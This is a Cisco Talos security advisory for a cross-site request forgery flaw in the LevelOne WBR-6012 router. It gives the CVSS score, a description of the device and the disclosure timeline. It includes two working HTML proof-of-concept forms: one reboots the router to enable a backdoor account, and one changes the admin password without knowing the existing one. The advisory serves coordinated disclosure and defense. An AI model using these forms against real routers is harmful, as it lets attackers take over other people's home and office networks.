CVE-2024-24777
A cross-site request forgery (CSRF) vulnerability exists in the Web Application functionality of the LevelOne WBR-6012 R0.40e6. A specially crafted HTTP request can lead to unauthorized access. An attacker can stage a malicious web page to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
LevelOne WBR-6012 R0.40e6
WBR-6012 - https://us.level1.com/products/wbr-6012
8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-352 - Cross-Site Request Forgery (CSRF)
The WBR-6012 is a wireless SOHO router. It is a low-cost device which functions as an internet gateway for homes and small offices while aiming to be easy to configure and operate. In addition to providing a WiFi access point, the device serves as a 4-port wired router and implements a variety of common SOHO router capabilities such as port forwarding, quality-of-service, web-based administration, a DHCP server, a basic DMZ, and UPnP capabilities.
The LevelOne WBR-6012 router’s web application has a CSRF vulnerability that permits attackers to execute unauthorized actions without the user’s knowledge because it lacks proper origin enforcement, allowing external websites to make requests as if they were the user. There does not appear to be any logic within the device’s firmware which checks the origin of HTTP requests.
The two proofs of concept below demonstrate leveraging the Cross Site Request Forgery (CSRF) vulnerability in conjunction with two other vulnerabilities to 1) reboot the device to enable the backdoor account (TALOS-2024-XXXX) and 2) change the admin’s password without knowing the exising password (TALOS-2024-XXXX).
Reboot the Device (enable the backdoor, TALOS-2024-1979)
<html>
<form enctype="application/x-www-form-urlencoded" method="GET" action="http://192.168.1.1/cgi-bin/rebo">
<table>
<tr>
<td></td>
<td><input type="text" value="undefined" name=""></td>
</tr>
</table><input type="submit" value="submit">
</form>
</html>
Change the Password (without knowledge of the existing password, TALOS-2024-1984)
<html>
<form enctype="application/x-www-form-urlencoded" method="POST" action="http://192.168.1.1/cgi-bin/pass">
<table>
<tr>
<td>dummy param</td>
<td><input type="text" value="test" name="test"></td>
</tr>
<tr>
<td>new pw</td>
<td><input type="text" value="test" name="Pa"></td>
</tr>
</table><input type="submit" value="http://192.168.1.1/cgi-bin/pass">
</form>
</html>
2024-06-03 - Vendor Disclosure
2024-08-05 - Status update request from TALOS - No reply
2024-09-03 - Status update request - Impending public release notification
2024-10-23 - Vendor notification of upcoming release date
2024-10-30 - Public Release
Discovered by Patrick DeSantis of Cisco Talos.